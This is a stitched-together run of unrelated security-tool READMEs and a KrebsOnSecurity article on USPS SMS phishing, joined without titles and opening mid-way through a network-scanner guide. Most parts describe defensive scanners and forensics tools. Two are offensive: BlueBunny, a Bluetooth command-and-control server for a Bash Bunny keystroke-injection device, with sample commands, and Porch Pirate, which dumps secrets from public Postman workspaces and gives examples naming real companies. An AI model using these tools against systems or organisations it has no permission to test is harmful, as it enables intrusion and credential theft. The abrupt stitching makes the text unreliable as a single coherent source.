$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l
You can save the scan results to a file by using the -o
or --output
flag followed by the desired output file name.
$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
IP Address   | MAC Address       | Packet Size | Manufacturer
-------------|-------------------|-------------|-----------------------------
192.168.1.1  | **:6e:**:97:**:28 | 102         | ASUSTek COMPUTER INC.
192.168.1.3  | 00:**:22:**:12:** | 102         | InPro Comm
192.168.1.2  | **:32:**:bf:**:00 | 102         | Xiaomi Communications Co Ltd
192.168.1.98 | d4:**:64:**:5c:** | 102         | ASUSTek COMPUTER INC.
192.168.1.25 | **:49:**:00:**:38 | 102         | Unknown
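The ARP sweep behind this output can be sketched in a few lines with scapy (illustrative, not NetProbe's actual code; requires root privileges):

# Sketch of an ARP sweep (illustrative only; pip install scapy).
from scapy.all import ARP, Ether, srp

def arp_scan(subnet="192.168.1.0/24", iface=None, timeout=2):
    # Broadcast a who-has request for every address in the subnet.
    packet = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=subnet)
    answered, _ = srp(packet, timeout=timeout, iface=iface, verbose=False)
    # Each reply carries the responder's IP and MAC address.
    return [(r.psrc, r.hwsrc) for _, r in answered]

for ip, mac in arp_scan():
    print(f"{ip:<16} {mac}")

Manufacturer names are then derived by looking up each MAC's OUI prefix in a vendor database.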
If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:
This program is released under the MIT LICENSE. See LICENSE for more information.
C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
Send your Bash Bunny all the instructions it needs just over the air.
pip install pygatt "pygatt[GATTTOOL]"
Make sure BlueZ is installed and gatttool
is usable
sudo apt install bluez
git clone https://github.com/90N45-d3v/BlueBunny
cd BlueBunny/C2
sudo python c2-server.py
Copy the payload (BlueBunny/payload.txt) to your Bash Bunny.
In your browser, open localhost:1472 and connect your Bash Bunny (your Bash Bunny will light up green when it's ready to pair).
You can also use BlueBunny's BLE backend and communicate with your Bash Bunny manually.
# Import the backend (BlueBunny/C2/BunnyLE.py)
import BunnyLE
# Define the data to send
data = "QUACK STRING I love my Bash Bunny"
# Define the type of the data to send ("cmd" or "payload") (payload data will be temporarily written to a file, to execute multiple commands like in a payload script file)
d_type = "cmd"
# Initialize BunnyLE
BunnyLE.init()
# Connect to your Bash Bunny
bb = BunnyLE.connect()
# Send the data and let it execute
BunnyLE.send(bb, data, d_type)
The Bluetooth stack used is well known but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Some kinds of errors can be caused by temporary bugs; these usually disappear at the latest after rebooting the C2's operating system, so don't be surprised if they show up.
As said above, BlueZ, the basis for the Bluetooth part used in BlueBunny, is somewhat bug-prone. If you encounter any non-temporary bugs when connecting to the Bash Bunny, or any other bugs or difficulties in the BlueBunny project, you are always welcome to contact me, be it with a problem, an idea or solution, or just some nice feedback.
Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconnaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.
Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:
python3 -m pip install porch-pirate
The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.
Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.
--globals
--collections
--requests
--urls
--dump
--raw
--curl
porch-pirate -s "coca-cola.com"
By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w
argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8
When an interesting result has been found with a simple search, we can provide the workspace ID to the -w
argument with the --dump
command to begin extracting information from the workspace and its collections.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump
Porch Pirate can be supplied a simple search term, following the --globals
argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.
porch-pirate -s "shopify" --globals
Porch Pirate can be supplied a simple search term, following the --dump
argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.
porch-pirate -s "coca-cola.com" --dump
A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls
Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.
porch-pirate -s "coca-cola.com" --urls
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw
porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME
Porch Pirate can build curl requests when provided with a request ID for easier testing.
porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl
porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080
p = porchpirate()
print(p.search('coca-cola.com'))
p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
requests = collection['requests']
for r in requests:
request_data = p.request(r['id'])
print(request_data)
p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
Other library usage examples can be located in the examples
directory, which contains the following examples:
dump_workspace.py
format_search_results.py
format_workspace_collections.py
format_workspace_globals.py
get_collection.py
get_collections.py
get_profile.py
get_request.py
get_statistics.py
get_team.py
get_user.py
get_workspace.py
recursive_globals_from_search.py
request_to_curl.py
search.py
search_by_page.py
workspace_collections.py
Service that scans your Infrastructure as Code for common vulnerabilities.
Aspect | Information |
---|---|
Tool name | IaC Scan Runner |
Docker image | xscanner/runner |
PyPI package | iac-scan-runner |
Documentation | docs |
Contact us | xopera@xlab.si |
The IaC Scan Runner is a REST API service used to scan IaC (Infrastructure as Code) packages and perform various code checks in order to find possible vulnerabilities and improvements. Explore the docs for more info.
This section explains how to run the REST API.
You can run the REST API using a public xscanner/runner Docker image as follows:
# run IaC Scan Runner REST API in a Docker container and
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 xscanner/runner
Or you can build the image locally and run it as follows:
# build Docker container (it will take some time)
$ docker build -t iac-scan-runner .
# run IaC Scan Runner REST API in a Docker container and
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 iac-scan-runner
To run using the IaC Scan Runner CLI:
# install the CLI
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install iac-scan-runner
# print OpenAPI specification
(.venv) $ iac-scan-runner openapi
# install prerequisites
(.venv) $ iac-scan-runner install
# run IaC Scan Runner REST API
(.venv) $ iac-scan-runner run
To run locally from source:
# Export env variables
export MONGODB_CONNECTION_STRING=mongodb://localhost:27017
export SCAN_PERSISTENCE=enabled
export USER_MANAGEMENT=enabled
# Setup MongoDB
$ docker run --name mongodb -p 27017:27017 mongo
# install prerequisites
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install -r requirements.txt
(.venv) $ ./install-checks.sh
# run IaC Scan Runner REST API (add --reload flag to apply code changes on the way)
(.venv) $ uvicorn src.iac_scan_runner.api:app
This part shows one possible deployment and short examples of how to use the API calls.
First, clone the iac-scan-runner repository and run the API.
$ git clone https://github.com/xlab-si/iac-scan-runner.git
$ docker compose up
After this is done you can use different API endpoints by calling localhost:8000. You can also navigate to localhost:8000/swagger or localhost:8000/redoc and test all the API endpoints there. In this example, we will use curl for calling API endpoints.
curl -X 'POST' \
'http://0.0.0.0:8000/project?creator_id=test' \
-H 'accept: application/json' \
-d ''
A project ID will be returned. For this example, the project ID is 1e7b2a91-2896-40fd-8d53-83db56088026.
curl -X 'PUT' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/checks/ansible-lint/disable' \
-H 'accept: application/json'
curl -X 'POST' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/scan?scan_response_type=json' \
-H 'accept: application/json' \
-H 'Content-Type: multipart/form-data' \
-F 'iac=@YOUR.zip;type=application/zip'
That is it.
At a certain point, it might be required to include new check tools within the scan workflow, with the aim of providing wider coverage of IaC standards and project types. This subsection identifies and describes the sequence of steps required for that purpose. For now these steps have to be performed manually, but the plan is to automate the procedure in the future via the API and to provide a user-friendly interface that aids the user while importing new tools into the catalogue that makes up the scan workflow. The following steps have to be taken in order to extend the scan workflow with a new tool.
Step 1 - Adding a tool-specific class to the checks directory. First, add a new tool-specific Python class to the checks directory inside IaC Scan Runner's source code: iac-scan-runner/src/iac_scan_runner/checks/new_tool.py
The class of the new tool inherits from the existing Check class, which provides a generalization of the scan workflow tools. Moreover, it is necessary to provide implementations of the methods required by the base class, as sketched below.
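As a hedged sketch of what such a class might look like (the exact interface is defined by IaC Scan Runner's Check base class; the import paths, method names, and run_command helper below are assumptions for illustration):

# Hedged sketch of a tool-specific check class (illustrative; consult the
# real Check base class for the exact required methods and signatures).
from iac_scan_runner.check import Check            # assumed import path
from iac_scan_runner.utils import run_command      # assumed helper

class NewToolCheck(Check):
    def __init__(self):
        super().__init__("new_tool", "Description of the new check tool")

    def configure(self, config_filename, secret):
        # Apply tool-specific configuration (rule files, API keys, ...).
        pass

    def run(self, directory):
        # Invoke the underlying scanner against the unpacked IaC package and
        # return its raw output for later result summarization.
        return run_command(f"new-tool --scan {directory}", directory)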
Step 2 - Adding the check tool class instance within the ScanRunner constructor. Once the new class derived from Check is added to the IaC Scan Runner's source code, the source code of its main class, ScanRunner, must also be modified: import the tool-specific class, create a new check tool-specific class instance, and add it to the dictionary of IaC checks inside def init_checks(self).
A. Importing the check tool class:
from iac_scan_runner.checks.tfsec import TfsecCheck
B. Creating a new instance of the check tool object inside init_checks:
"""Initiate predefined check objects"""
new_tool = NewToolCheck()
C. Adding it to the self.iac_checks dictionary inside init_checks:
self.iac_checks = {
new_tool.name: new_tool,
β¦
}
Step 3 - Adding the check tool to the compatibility matrix inside the Compatibility class. Inside the file src/iac_scan_runner/compatibility.py, the dictionary that represents the compatibility matrix should be extended as well. There are two possible cases: a) a new file type is added as a key, together with a list of relevant tools as the value, or b) a new tool is added to the compatibility list of an existing file type.
compatibility_matrix = {
"new_type": ["new_tool_1", "new_tool_2"],
β¦
"old_typeK": ["tool_1", β¦ "tool_N", "new_tool_3"]
}
Step 4 - Providing support for result summarization. Finally, the last modification required to extend the scan workflow is to the ResultsSummary class (src/iac_scan_runner/results_summary.py). Specifically, append to its summarize_outcome method code that looks for tool-specific strings that identify whether the check passed or failed. Inside the loop that traverses the compatible checks, include the following if-else structure for each new tool:
if check == "new_tool":
if outcome.find("Check pass string") > -1:
self.outcomes[check]["status"] = "Passed"
return "Passed"
else:
self.outcomes[check]["status"] = "Problems"
return "Problems"
You can contact the xOpera team by sending an email to xopera@xlab.si.
This project has received funding from the European Unionβs Horizon 2020 research and innovation programme under Grant Agreement No. 101000162 (PIACERE).
Existing tools don't really "understand" code. Instead, they mostly parse texts.
DeepSecrets expands classic regex-search approaches with semantic analysis, dangerous variable detection, and more efficient usage of entropy analysis. Code understanding supports 500+ languages and formats and is achieved by lexing and parsing - techniques commonly used in SAST tools.
DeepSecrets also introduces a new way to find secrets: just use hashed values of your known secrets and get them found plain in your code.
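The idea is simple to sketch (illustrative only; DeepSecrets' actual ruleset format and hashing scheme may differ):

# Sketch of hashed-secret matching: the ruleset ships only hashes, so known
# secrets can be hunted without disclosing them (illustrative only).
import hashlib

KNOWN_SECRET_HASHES = {
    # sha256("hunter2"), precomputed offline
    "f52fbd32b2b3b86ff88ef6c490628285f482af15ddcb29541f94bcf526a3f6c7",
}

def find_hashed_secrets(tokens):
    for token in tokens:
        if hashlib.sha256(token.encode()).hexdigest() in KNOWN_SECRET_HASHES:
            yield token

print(list(find_hashed_secrets(["db_user", "hunter2", "localhost"])))  # ['hunter2']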
The under-the-hood story is told in this article series: https://hackernoon.com/modernizing-secrets-scanning-part-1-the-problem
Pff, is it still regex-based?
Yes and no. Of course it uses regexes and finds typed secrets like any other tool. But language understanding (the lexing stage) and variable detection also use regexes under the hood. So regexes are an instrument, not a problem.
Why don't you build true abstract syntax trees? It's academically more correct!
DeepSecrets tries to keep a balance between complexity and effectiveness. Building a true AST is a pretty complex thing and simply an overkill for our specific task. So the tool still follows the generic SAST-way of code analysis but optimizes the AST part using a different approach.
I'd like to build my own semantic rules. How do I do that?
Only through the code at the moment. Formalizing the rules and moving them into a flexible, user-controlled ruleset is in the plans.
I still have a question
Feel free to communicate with the maintainer
From Github via pip
$ pip install git+https://github.com/avito-tech/deepsecrets.git
From PyPi
$ pip install deepsecrets
The easiest way:
$ deepsecrets --target-dir /path/to/your/code --outfile report.json
This will run a scan against /path/to/your/code using the default configuration. The report will be saved to report.json.
Run deepsecrets --help
for details.
Basically, you can use your own ruleset by specifying --regex-rules. Paths to be excluded from scanning can be set via --excluded-paths.
The built-in ruleset for regex checks is located in /deepsecrets/rules/regexes.json
. You're free to follow the format and create a custom ruleset.
There are several core concepts:
File
Tokenizer
Token
Engine
Finding
ScanMode
Just a pythonic representation of a file with all needed methods for management.
A component able to break the content of a file into pieces - Tokens - by its own logic. There are four types of tokenizers available:
FullContentTokenizer: treats all content as a single token. Useful for regex-based search.
PerWordTokenizer: breaks given content by words and line breaks.
LexerTokenizer: uses language-specific smarts to break code into semantically correct pieces with additional context for each token.
A Token is a string with additional information about its semantic role, corresponding file, and location inside it.
A component performing secrets search for a single token by its own logic. Returns a set of Findings. There are three engines available:
RegexEngine: checks tokens' values through a special ruleset.
SemanticEngine: checks tokens produced by the LexerTokenizer using additional context - variable names and values.
HashedSecretEngine: checks tokens' values by hashing them and trying to find coinciding hashes inside a special ruleset.
A Finding is a data structure representing a problem detected inside code. It features information about the precise location inside a file and the rule that found it.
This component is responsible for the scan process. The PerFileAnalyzer is the method called against each file, returning a list of findings; its primary usage is to initialize the necessary engines, tokenizers, and rulesets. The current implementation has a CliScanMode built from the user-provided config through the CLI args.
The project is meant to be developed using VSCode and the 'Remote Containers' feature.
Steps:
CureIAM is an easy-to-use, reliable, and performant engine for Least Privilege Principle enforcement on GCP cloud infrastructure. It enables DevOps and security teams to quickly clean up accounts in GCP infra that have been granted more permissions than they require. CureIAM fetches recommendations and insights from the GCP IAM recommender, scores them, and enforces those recommendations automatically on a daily basis. It takes care of scheduling and all other aspects of running these enforcement jobs at scale. It is built on top of the GCP IAM recommender APIs and the Cloudmarker framework.
Discover what makes CureIAM scalable and production grade.
Every recommendation is scored with three scores: safe_to_apply_score, risk_score, and over_privilege_score. Each score serves a different purpose; for example, safe_to_apply_score identifies whether a recommendation can be applied on an automated basis, based on the threshold set in the CureIAM.yaml config file.
Since CureIAM is built with Python, you can run it locally with these commands. Before running, make sure a configuration file is ready in one of /etc/CureIAM.yaml, ~/.CureIAM.yaml, ~/CureIAM.yaml, or CureIAM.yaml, and that a service account JSON file is present in the current directory, preferably named cureiamSA.json. The SA private key can be named anything, but for the Docker image build it is preferred to use this name. Make sure to reference this file in the GCP cloud section of the config.
# Install necessary dependencies
$ pip install -r requirements.txt
# Run CureIAM now
$ python -m CureIAM -n
# Run CureIAM process as schedular
$ python -m CureIAM
# Check CureIAM help
$ python -m CureIAM --help
CureIAM can be also run inside a docker environment, this is completely optional and can be used for CI/CD with K8s cluster deployment.
# Build docker image from dockerfile
$ docker build -t cureiam .
# Run the image, as schedular
$ docker run -d cureiam
# Run the image now
$ docker run -f cureiam -m cureiam -n
The CureIAM.yaml configuration file is the heart of the CureIAM engine. Everything the engine does is based on the pipeline configured in this config file. Let's break it down into sections to make the config simpler.
logger:
version: 1
disable_existing_loggers: false
formatters:
verysimple:
format: >-
[%(process)s]
%(name)s:%(lineno)d - %(message)s
datefmt: "%Y-%m-%d %H:%M:%S"
handlers:
rich_console:
class: rich.logging.RichHandler
formatter: verysimple
file:
class: logging.handlers.TimedRotatingFileHandler
formatter: simple
filename: /tmp/CureIAM.log
when: midnight
encoding: utf8
backupCount: 5
loggers:
adal-python:
level: INFO
root:
level: INFO
handlers:
- rich_console
- file
schedule: "16:00"
This subsection of the config uses the Rich logging module and schedules CureIAM to run daily at 16:00.
Plugins are declared in the plugins section of CureIAM.yaml. You can think of this section as the declaration of the different plugins.
plugins:
gcpCloud:
plugin: CureIAM.plugins.gcp.gcpcloud.GCPCloudIAMRecommendations
params:
key_file_path: cureiamSA.json
filestore:
plugin: CureIAM.plugins.files.filestore.FileStore
gcpIamProcessor:
plugin: CureIAM.plugins.gcp.gcpcloudiam.GCPIAMRecommendationProcessor
params:
mode_scan: true
mode_enforce: true
enforcer:
key_file_path: cureiamSA.json
allowlist_projects:
- alpha
blocklist_projects:
- beta
blocklist_accounts:
- foo@bar.com
allowlist_account_types:
- user
- group
- serviceAccount
blocklist_account_types:
- None
min_safe_to_apply_score_user: 0
min_safe_to_apply_score_group: 0
min_safe_to_apply_score_SA: 50
esstore:
plugin: CureIAM.plugins.elastic.esstore.EsStore
params:
# Change http to https later if your elastic are using https
scheme: http
host: es-host.com
port: 9200
index: cureiam-stg
username: security
password: securepassword
Each of these plugins declaration has to be of this form:
plugins:
<plugin-name>:
plugin: <class-name-as-python-path>
params:
param1: val1
param2: val2
For example, take the plugin CureIAM.stores.esstore.EsStore, i.e. the EsStore class. All the params defined in the YAML have to match the declaration in the __init__() function of the same plugin class.
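In other words, the plugin's __init__() signature mirrors its params block; a hedged sketch (the parameter defaults are illustrative):

# Sketch: __init__() parameters mirror the params keys in CureIAM.yaml
# (illustrative; see the real EsStore class for the full list).
class EsStore:
    def __init__(self, scheme="http", host="localhost", port=9200,
                 index="cureiam-stg", username=None, password=None):
        # Each keyword argument corresponds to a params key in the YAML.
        self._base_url = f"{scheme}://{host}:{port}"
        self._index = index
        self._auth = (username, password)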
audits:
IAMAudit:
clouds:
- gcpCloud
processors:
- gcpIamProcessor
stores:
- filestore
- esstore
Multiple audits can be created from this. The one created here is named IAMAudit, with four plugins in use: gcpCloud, gcpIamProcessor, filestore and esstore. Note these are the same plugin names defined in Step 2. Again, this is like defining the pipeline, not actually running it; it is considered for running with the definition in the next step.
Finally, schedule CureIAM to run the audits defined in the previous step:
run:
- IAMAudit
And that completes the configuration for CureIAM. You can find the full sample here; this config-driven pipeline concept is inherited from the Cloudmarker framework.
The JSON which is indexed in elasticsearch using Elasticsearch store plugin, can be used to generate dashboard in Kibana.
[Please do!] We are looking for any kind of contribution to improve CureIAM's core functionality and documentation. When in doubt, make a PR!
Gojek Product Security Team
- Added the version in the library to avoid any backward-compatibility issues.
- Running docker compose: docker-compose -f docker_compose_es.yaml up
- mode_scan: true
- mode_enforce: false
MemTracer is a tool that offers live memory analysis capabilities, allowing digital forensic practitioners to discover and investigate stealthy attack traces hidden in memory. MemTracer is implemented in Python and aims to detect reflectively loaded native .NET framework Dynamic-Link Libraries (DLLs). This is achieved by looking for the following abnormal memory region characteristics:
The tool starts by scanning the running processes, and by analyzing the allocated memory regions characteristics to detect reflective DLL loading symptoms. Suspicious memory regions which are identified as DLL modules are dumped for further analysis and investigation.
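The core of that memory-region walk can be sketched with ctypes and VirtualQueryEx (a simplified illustration of the approach, not MemTracer's actual code; Windows only):

# Sketch: walk a process's memory regions and flag private committed RWX
# regions, a classic symptom of reflective DLL loading (illustrative only).
import ctypes
from ctypes import wintypes

MEM_COMMIT, MEM_PRIVATE = 0x1000, 0x20000
PAGE_EXECUTE_READWRITE = 0x40
PROCESS_QUERY_INFORMATION, PROCESS_VM_READ = 0x0400, 0x0010

class MEMORY_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [("BaseAddress", ctypes.c_void_p),
                ("AllocationBase", ctypes.c_void_p),
                ("AllocationProtect", wintypes.DWORD),
                ("RegionSize", ctypes.c_size_t),
                ("State", wintypes.DWORD),
                ("Protect", wintypes.DWORD),
                ("Type", wintypes.DWORD)]

def suspicious_regions(pid):
    k32 = ctypes.windll.kernel32
    handle = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
                             False, pid)
    mbi, addr = MEMORY_BASIC_INFORMATION(), 0
    while k32.VirtualQueryEx(handle, ctypes.c_void_p(addr),
                             ctypes.byref(mbi), ctypes.sizeof(mbi)):
        if (mbi.State == MEM_COMMIT and mbi.Type == MEM_PRIVATE
                and mbi.Protect == PAGE_EXECUTE_READWRITE):
            yield addr, mbi.RegionSize  # candidate region for dumping
        addr += mbi.RegionSize
    k32.CloseHandle(handle)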
Furthermore, the tool features the following options:
python.exe memScanner.py [-h] [-r] [-m MODULE]
-h, --help show this help message and exit
-r, --reflectiveScan Looking for reflective DLL loading
-m MODULE, --module MODULE Looking for a specific loaded DLL
The script needs administrator privileges in order to inspect all processes.
The fake USPS phishing page.
Recent weeks have seen a sizable uptick in the number of phishing scams targeting U.S. Postal Service (USPS) customers. Here's a look at an extensive SMS phishing operation that tries to steal personal and financial data by spoofing the USPS, as well as postal services in at least a dozen other countries.
KrebsOnSecurity recently heard from a reader who received an SMS purporting to have been sent by the USPS, saying there was a problem with a package destined for the reader's address. Clicking the link in the text message brings one to the domain usps.informedtrck[.]com.
The landing page generated by the phishing link includes the USPS logo, and says "Your package is on hold for an invalid recipient address. Fill in the correct address info by the link." Below that message is a "Click update" button that takes the visitor to a page that asks for more information.
The remaining buttons on the phishing page all link to the real USPS.com website. After collecting your address information, the fake USPS site goes on to request additional personal and financial data.
This phishing domain was recently registered and its WHOIS ownership records are basically nonexistent. However, we can find some compelling clues about the extent of this operation by loading the phishing page in Developer Tools, a set of debugging features built into Firefox, Chrome and Safari that allow one to closely inspect a webpage's code and operations.
Check out the bottom portion of the screenshot below, and you'll notice that this phishing site fails to load some external resources, including an image from a link called fly.linkcdn[.]to.
A search on this domain at the always-useful URLscan.io shows that fly.linkcdn[.]to is tied to a slew of USPS-themed phishing domains. Here are just a few of those domains (links defanged to prevent accidental clicking):
usps.receivepost[.]com
usps.informedtrck[.]com
usps.trckspost[.]com
postreceive[.]com
usps.trckpackages[.]com
usps.infortrck[.]com
usps.quicktpos[.]com
usps.postreceive[.]com
usps.revepost[.]com
trackingusps.infortrck[.]com
usps.trckmybusi[.]com
tackingpos[.]com
usps.trckstamp[.]com
usa-usps[.]shop
unlistedstampreceive[.]com
usps.stampreceive[.]com
usps.stamppos[.]com
usps.stampspos[.]com
usps.trckmypost[.]com
usps.trckintern[.]com
usps.tackingpos[.]com
usps.posinformed[.]com
As we can see in the screenshot below, the developer tools console for informedtrck[.]com complains that the site is unable to load a Google Analytics code, UA-80133954-3, which apparently was rejected for pointing to an invalid domain.
Notice the highlighted Google Analytics code exposed by a faulty JavaScript element on the phishing website. That code actually belongs to the USPS.
The valid domain for that Google Analytics code is the official usps.com website. According to dnslytics.com, that same analytics code has shown up on at least six other nearly identical USPS phishing pages dating back nearly as many years, including onlineuspsexpress[.]com, which DomainTools.com says was registered way back in September 2018 to an individual in Nigeria.
A different domain with that same Google Analytics code that was registered in 2021 is peraltansepeda[.]com, which archive.org shows was running a similar set of phishing pages targeting USPS users. DomainTools.com indicates this website name was registered by phishers based in Indonesia.
DomainTools says the above-mentioned USPS phishing domain stamppos[.]com was registered in 2022 via Singapore-based Alibaba.com, but the registrant city and state listed for that domain says "Georgia, AL," which is not a real location.
Alas, running a search for domains registered through Alibaba to anyone claiming to reside in Georgia, AL reveals nearly 300 recent postal phishing domains ending in ".top." These domains are either administrative domains obscured by a password-protected login page, or are .top domains phishing customers of the USPS as well as postal services serving other countries.
Those other nations include the Australia Post, An Post (Ireland), Correos.es (Spain), the Costa Rican post, the Chilean Post, the Mexican Postal Service, Poste Italiane (Italy), PostNL (Netherlands), PostNord (Denmark, Norway and Sweden), and Posti (Finland). A complete list of these domains is available here (PDF).
A phishing page targeting An Post, the state-owned provider of postal services in Ireland.
The Georgia, AL domains at Alibaba also encompass several that spoof sites claiming to collect outstanding road toll fees and fines on behalf of the governments of Australia, New Zealand and Singapore.
An anonymous reader wrote in to say they submitted fake information to the above-mentioned phishing site usps.receivepost[.]com via the malware sandbox any.run. A video recording of that analysis shows that the site sends any submitted data via an automated bot on the Telegram instant messaging service.
The traffic analysis just below the any.run video shows that any data collected by the phishing site is being sent to the Telegram user @chenlun, who offers to sell customized source code for phishing pages. From a review of @chenlun's other Telegram channels, it appears this account is being massively spammed at the moment, possibly thanks to public attention brought by this story.
Meanwhile, researchers at DomainTools recently published a report on an apparently unrelated but equally sprawling SMS-based phishing campaign targeting USPS customers that appears to be the work of cybercriminals based in Iran.
Phishers tend to cast a wide net and often spoof entities that are broadly used by the local population, and few brands are going to have more household reach than domestic mail services. In June, the United Parcel Service (UPS) disclosed that fraudsters were abusing an online shipment tracking tool in Canada to send highly targeted SMS phishing messages that spoofed the UPS and other brands.
With the holiday shopping season nearly upon us, now is a great time to remind family and friends about the best advice to sidestep phishing scams: avoid clicking on links or attachments that arrive unbidden in emails, text messages and other media. Most phishing scams invoke a sense of urgency, warning of negative consequences should you fail to respond or act quickly.
If you're unsure whether the message is legitimate, take a deep breath and visit the site or service in question manually, ideally using a browser bookmark so as to avoid potential typosquatting sites.
Update: Added information about the Telegram bot and any.run analysis.
The Daksh SCRA (Source Code Review Assist) tool is built to enhance the efficiency of the source code review process, providing a well-structured and organized approach for code reviewers.
Rather than indiscriminately flagging everything as a potential issue, Daksh SCRA promotes thoughtful analysis: potential problems are investigated and confirmed before being tagged as bugs. This emphasis on avoiding unnecessary bug tagging mitigates the scramble to mark every concern as a bug and cuts down on the false positives that often consume valuable time and resources, fostering a more productive and efficient code review process.
Daksh SCRA was first introduced, with a deliberately low profile and no major announcement, during a source code review training session I conducted at Black Hat USA 2022 (August 6 - 9).
While the tool was quietly published on GitHub after that training, its official public debut took place at Black Hat USA 2023 in Las Vegas.
Identifies Areas of Interest in Source Code: Encourages focused investigation and confirmation rather than indiscriminately labeling everything as a bug.
Identifies Areas of Interest in File Paths (World's First): Recognises patterns in file paths to pinpoint relevant sections for review.
Software-Level Reconnaissance to Identify Technologies Utilised: Identifies the project's technologies, enabling code reviewers to conduct precise scans with appropriate rules (see the sketch after this list).
Automated Scientific Effort Estimation for Code Review (World's First): Provides a measurable approach for estimating the effort required for a code review.
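To illustrate the reconnaissance step, here is a minimal sketch, not Daksh SCRA's actual logic, that guesses a project's dominant technology from file extensions so a matching rule file can be picked; the mapping and the /path_to_source_dir placeholder are assumptions:

from collections import Counter
import os

# Hypothetical extension-to-rule-file mapping; real reconnaissance would
# also fingerprint frameworks and platform-specific config files.
RULE_HINTS = {".php": "php", ".java": "java", ".cs": "dotnet", ".js": "javascript"}

counts = Counter()
for root, _dirs, files in os.walk("/path_to_source_dir"):  # placeholder path
    for name in files:
        ext = os.path.splitext(name)[1].lower()
        if ext in RULE_HINTS:
            counts[RULE_HINTS[ext]] += 1

# Suggest the rule file (-r) for the most common technology found
print("suggested -r value:", counts.most_common(1)[0][0] if counts else "unknown")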
Although this tool has progressed beyond its early stages, it is now functional, usable, and delivers on its promised capabilities. Active enhancement continues, with multiple new features and improvements expected in the upcoming months.
Additionally, the tool offers the following functionalities:
Refer to the wiki for the tool setup and usage details - https://github.com/coffeeandsecurity/DakshSCRA/wiki
Feel free to contribute towards updating or adding new rules and future development.
If you find any bugs, report them to d3basis.m0hanty@gmail.com.
Python3 and all the libraries listed in requirements.txt
$ pip install virtualenv
$ virtualenv -p python3 {name-of-virtual-env}   # create a virtualenv
Example: virtualenv -p python3 venv
$ source {name-of-virtual-env}/bin/activate   # activate the virtual environment you just created
Example: source venv/bin/activate
After running the activate command you should see the name of your virtual env at the beginning of your terminal like this: (venv) $
Run the command below after activating the virtual environment as described in the previous steps.
pip install -r requirements.txt
Once the above step successfully installs all the required libraries, refer to the following tool usage commands to run the tool.
$ python3 dakshscra.py -h   # To view available options and arguments
usage: dakshscra.py [-h] [-r RULE_FILE] [-f FILE_TYPES] [-v] [-t TARGET_DIR] [-l {R,RF}] [-recon] [-estimate]
options:
-h, --help show this help message and exit
-r RULE_FILE Specify platform specific rule name
-f FILE_TYPES Specify file types to scan
-v Specify verbosity level {'-v', '-vv', '-vvv'}
-t TARGET_DIR Specify target directory path
-l {R,RF}, --list {R,RF}
List rules [R] OR rules and filetypes [RF]
-recon Detects platform, framework and programming language used
-estimate Estimate efforts required for code review
$ python3 dakshscra.py   # To view tool usage along with examples
Examples:
# '-f' is optional. If not specified, it defaults to the filetypes corresponding to the selected rule.
dakshscra.py -r php -t /source_dir_path
# To override the default settings, other filetypes can be specified with the '-f' option.
dakshscra.py -r php -f dotnet -t /path_to_source_dir
dakshscra.py -r php -f custom -t /path_to_source_dir
# Perform reconnaissance and rule-based scanning if '-recon' is used with the '-r' option.
dakshscra.py -recon -r php -t /path_to_source_dir
# Perform only reconnaissance if '-recon' is used without the '-r' option.
dakshscra.py -recon -t /path_to_source_dir
# Verbosity: '-v' is the default; '-vvv' displays all rule checks within each rule category.
dakshscra.py -r php -vv -t /path_to_source_dir
Supported RULE_FILE: dotnet, java, php, javascript
